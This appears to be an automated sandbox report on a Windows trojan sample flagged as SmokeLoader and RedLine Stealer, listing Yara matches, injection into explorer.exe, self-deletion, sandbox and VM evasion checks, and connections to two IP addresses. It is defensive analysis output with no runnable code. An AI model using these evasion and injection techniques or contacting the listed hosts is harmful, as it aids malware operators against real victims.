Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000001.00000000.1811826279.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 00000000.00000002.1827317925.0000000002C41000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1827175401.0000000002BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2069997356.0000000002E11000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2069943713.0000000002DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.1827444929.0000000002C9D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1827317925.0000000002C41000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1827175401.0000000002BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000005.00000002.2069915449.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000005.00000002.2069997356.0000000002E11000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1827149563.0000000002BC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000005.00000002.2070115442.0000000002E4C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000005.00000002.2069943713.0000000002DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown

Source: C:\Windows\explorer.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\FyDBXJE74v.exe	Code function: 0_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401514
Source: C:\Users\user\Desktop\FyDBXJE74v.exe	Code function: 0_2_00402F97 RtlCreateUserThread,NtTerminateProcess,	0_2_00402F97
Source: C:\Users\user\Desktop\FyDBXJE74v.exe	Code function: 0_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401542
Source: C:\Users\user\Desktop\FyDBXJE74v.exe	Code function: 0_2_00403247 NtTerminateProcess,GetModuleHandleA,	0_2_00403247
Source: C:\Users\user\Desktop\FyDBXJE74v.exe	Code function: 0_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401549
Source: C:\Users\user\Desktop\FyDBXJE74v.exe	Code function: 0_2_0040324F NtTerminateProcess,GetModuleHandleA,	0_2_0040324F
Source: C:\Users\user\Desktop\FyDBXJE74v.exe	Code function: 0_2_00403256 NtTerminateProcess,GetModuleHandleA,	0_2_00403256
Source: C:\Users\user\Desktop\FyDBXJE74v.exe	Code function: 0_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401557
Source: C:\Users\user\Desktop\FyDBXJE74v.exe	Code function: 0_2_0040326C NtTerminateProcess,GetModuleHandleA,	0_2_0040326C
Source: C:\Users\user\Desktop\FyDBXJE74v.exe	Code function: 0_2_00403277 NtTerminateProcess,GetModuleHandleA,	0_2_00403277
Source: C:\Users\user\Desktop\FyDBXJE74v.exe	Code function: 0_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004014FE
Source: C:\Users\user\Desktop\FyDBXJE74v.exe	Code function: 0_2_00403290 NtTerminateProcess,GetModuleHandleA,	0_2_00403290
Source: C:\Users\user\AppData\Roaming\wsbgrgh	Code function: 5_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401514
Source: C:\Users\user\AppData\Roaming\wsbgrgh	Code function: 5_2_00402F97 RtlCreateUserThread,NtTerminateProcess,	5_2_00402F97
Source: C:\Users\user\AppData\Roaming\wsbgrgh	Code function: 5_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401542
Source: C:\Users\user\AppData\Roaming\wsbgrgh	Code function: 5_2_00403247 NtTerminateProcess,GetModuleHandleA,	5_2_00403247
Source: C:\Users\user\AppData\Roaming\wsbgrgh	Code function: 5_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401549
Source: C:\Users\user\AppData\Roaming\wsbgrgh	Code function: 5_2_0040324F NtTerminateProcess,GetModuleHandleA,	5_2_0040324F
Source: C:\Users\user\AppData\Roaming\wsbgrgh	Code function: 5_2_00403256 NtTerminateProcess,GetModuleHandleA,	5_2_00403256
Source: C:\Users\user\AppData\Roaming\wsbgrgh	Code function: 5_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401557
Source: C:\Users\user\AppData\Roaming\wsbgrgh	Code function: 5_2_0040326C NtTerminateProcess,GetModuleHandleA,	5_2_0040326C
Source: C:\Users\user\AppData\Roaming\wsbgrgh	Code function: 5_2_00403277 NtTerminateProcess,GetModuleHandleA,	5_2_00403277
Source: C:\Users\user\AppData\Roaming\wsbgrgh	Code function: 5_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_004014FE
Source: C:\Users\user\AppData\Roaming\wsbgrgh	Code function: 5_2_00403290 NtTerminateProcess,GetModuleHandleA,	5_2_00403290

Source: C:\Users\user\Desktop\FyDBXJE74v.exe	Code function: 0_2_00415F50		0_2_00415F50
Source: C:\Users\user\AppData\Roaming\wsbgrgh	Code function: 5_2_00415F50		5_2_00415F50

Source: FyDBXJE74v.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.1827444929.0000000002C9D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1827317925.0000000002C41000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1827175401.0000000002BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000005.00000002.2069915449.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000005.00000002.2069997356.0000000002E11000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1827149563.0000000002BC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000005.00000002.2070115442.0000000002E4C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000005.00000002.2069943713.0000000002DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23

Source: FyDBXJE74v.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: wsbgrgh.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@2/2@4/2

Source: C:\Users\user\Desktop\FyDBXJE74v.exe

Code function: 0_2_02CA0A22 CreateToolhelp32Snapshot,Module32First,

0_2_02CA0A22

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\wsbgrgh

Jump to behavior

Source: FyDBXJE74v.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\FyDBXJE74v.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: FyDBXJE74v.exe	ReversingLabs: Detection: 39%
Source: FyDBXJE74v.exe	Virustotal: Detection: 41%

Source: unknown	Process created: C:\Users\user\Desktop\FyDBXJE74v.exe "C:\Users\user\Desktop\FyDBXJE74v.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\wsbgrgh C:\Users\user\AppData\Roaming\wsbgrgh

Source: C:\Users\user\Desktop\FyDBXJE74v.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FyDBXJE74v.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\FyDBXJE74v.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.shell.broker.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wsbgrgh	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wsbgrgh	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wsbgrgh	Section loaded: msvcr100.dll	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\FyDBXJE74v.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\FyDBXJE74v.exe	Unpacked PE file: 0.2.FyDBXJE74v.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.kibojis:W;.xeto:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\wsbgrgh	Unpacked PE file: 5.2.wsbgrgh.400000.0.unpack .text:ER;.rdata:R;.data:W;.kibojis:W;.xeto:W;.rsrc:R; vs .text:EW;

Source: FyDBXJE74v.exe	Static PE information: section name: .kibojis
Source: FyDBXJE74v.exe	Static PE information: section name: .xeto
Source: wsbgrgh.1.dr	Static PE information: section name: .kibojis
Source: wsbgrgh.1.dr	Static PE information: section name: .xeto

Source: C:\Users\user\Desktop\FyDBXJE74v.exe	Code function: 0_2_004014D9 pushad ; ret	0_2_004014E9
Source: C:\Users\user\Desktop\FyDBXJE74v.exe	Code function: 0_2_004031DB push eax; ret	0_2_004032AB
Source: C:\Users\user\Desktop\FyDBXJE74v.exe	Code function: 0_2_02BC1540 pushad ; ret	0_2_02BC1550
Source: C:\Users\user\Desktop\FyDBXJE74v.exe	Code function: 0_2_02C9D7E4 pushad ; retf	0_2_02C9D7E5
Source: C:\Users\user\Desktop\FyDBXJE74v.exe	Code function: 0_2_02CA447B push esp; ret	0_2_02CA447D
Source: C:\Users\user\Desktop\FyDBXJE74v.exe	Code function: 0_2_02CA331B pushfd ; iretd	0_2_02CA331C
Source: C:\Users\user\Desktop\FyDBXJE74v.exe	Code function: 0_2_02CA281E push B63524ADh; retn 001Fh	0_2_02CA2855
Source: C:\Users\user\AppData\Roaming\wsbgrgh	Code function: 5_2_004014D9 pushad ; ret	5_2_004014E9
Source: C:\Users\user\AppData\Roaming\wsbgrgh	Code function: 5_2_004031DB push eax; ret	5_2_004032AB
Source: C:\Users\user\AppData\Roaming\wsbgrgh	Code function: 5_2_02DE1540 pushad ; ret	5_2_02DE1550
Source: C:\Users\user\AppData\Roaming\wsbgrgh	Code function: 5_2_02E535B3 push esp; ret	5_2_02E535B5
Source: C:\Users\user\AppData\Roaming\wsbgrgh	Code function: 5_2_02E51956 push B63524ADh; retn 001Fh	5_2_02E5198D
Source: C:\Users\user\AppData\Roaming\wsbgrgh	Code function: 5_2_02E52453 pushfd ; iretd	5_2_02E52454

Source: FyDBXJE74v.exe	Static PE information: section name: .text entropy: 7.557544545964827
Source: wsbgrgh.1.dr	Static PE information: section name: .text entropy: 7.557544545964827

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\wsbgrgh

Jump to dropped file

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\wsbgrgh

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\fydbxje74v.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\wsbgrgh:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Windows\explorer.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\FyDBXJE74v.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\FyDBXJE74v.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\FyDBXJE74v.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\FyDBXJE74v.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\FyDBXJE74v.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\FyDBXJE74v.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wsbgrgh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wsbgrgh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wsbgrgh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wsbgrgh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wsbgrgh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wsbgrgh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\FyDBXJE74v.exe	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\Desktop\FyDBXJE74v.exe	API/Special instruction interceptor: Address: 7FFE2220D584
Source: C:\Users\user\AppData\Roaming\wsbgrgh	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\AppData\Roaming\wsbgrgh	API/Special instruction interceptor: Address: 7FFE2220D584

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: wsbgrgh, 00000005.00000002.2070030613.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ASWHOOK

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 459	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 3602	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 843	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 358	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1222	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 893	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 863	Jump to behavior

Source: C:\Windows\explorer.exe TID: 7628	Thread sleep count: 459 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7636	Thread sleep count: 3602 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7636	Thread sleep time: -360200s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7632	Thread sleep count: 843 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7632	Thread sleep time: -84300s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 8004	Thread sleep count: 273 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 8008	Thread sleep count: 318 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 8008	Thread sleep time: -31800s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 8012	Thread sleep count: 358 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 8012	Thread sleep time: -35800s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7636	Thread sleep count: 1222 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7636	Thread sleep time: -122200s >= -30000s	Jump to behavior

Source: explorer.exe, 00000001.00000000.1814416539.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000001.00000000.1813742183.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000001.00000000.1811826279.00000000078A0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000001.00000000.1814416539.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000001.00000000.1811826279.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
Source: explorer.exe, 00000001.00000000.1810364612.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 00000001.00000000.1811826279.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000001.00000000.1814416539.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000001.00000000.1811826279.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTTAVMWare
Source: explorer.exe, 00000001.00000000.1813742183.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: explorer.exe, 00000001.00000000.1813742183.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1813742183.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000001.00000000.1814416539.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000001.00000000.1811826279.0000000007A34000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 00000001.00000000.1813742183.0000000009660000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000001.00000000.1810364612.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000001.00000000.1810364612.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\FyDBXJE74v.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\FyDBXJE74v.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\FyDBXJE74v.exe	System information queried: CodeIntegrityInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\wsbgrgh	System information queried: CodeIntegrityInformation			Jump to behavior

Source: C:\Users\user\Desktop\FyDBXJE74v.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Roaming\wsbgrgh	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\FyDBXJE74v.exe	Code function: 0_2_02BC0D90 mov eax, dword ptr fs:[00000030h]	0_2_02BC0D90
Source: C:\Users\user\Desktop\FyDBXJE74v.exe	Code function: 0_2_02BC092B mov eax, dword ptr fs:[00000030h]	0_2_02BC092B
Source: C:\Users\user\Desktop\FyDBXJE74v.exe	Code function: 0_2_02CA02FF push dword ptr fs:[00000030h]	0_2_02CA02FF
Source: C:\Users\user\AppData\Roaming\wsbgrgh	Code function: 5_2_02DE0D90 mov eax, dword ptr fs:[00000030h]	5_2_02DE0D90
Source: C:\Users\user\AppData\Roaming\wsbgrgh	Code function: 5_2_02DE092B mov eax, dword ptr fs:[00000030h]	5_2_02DE092B
Source: C:\Users\user\AppData\Roaming\wsbgrgh	Code function: 5_2_02E4F437 push dword ptr fs:[00000030h]	5_2_02E4F437

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: wsbgrgh.1.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 109.175.29.39 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 78.89.199.216 80			Jump to behavior

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\FyDBXJE74v.exe	Thread created: C:\Windows\explorer.exe EIP: 13A19A8			Jump to behavior
Source: C:\Users\user\AppData\Roaming\wsbgrgh	Thread created: unknown EIP: 87F19A8			Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\FyDBXJE74v.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
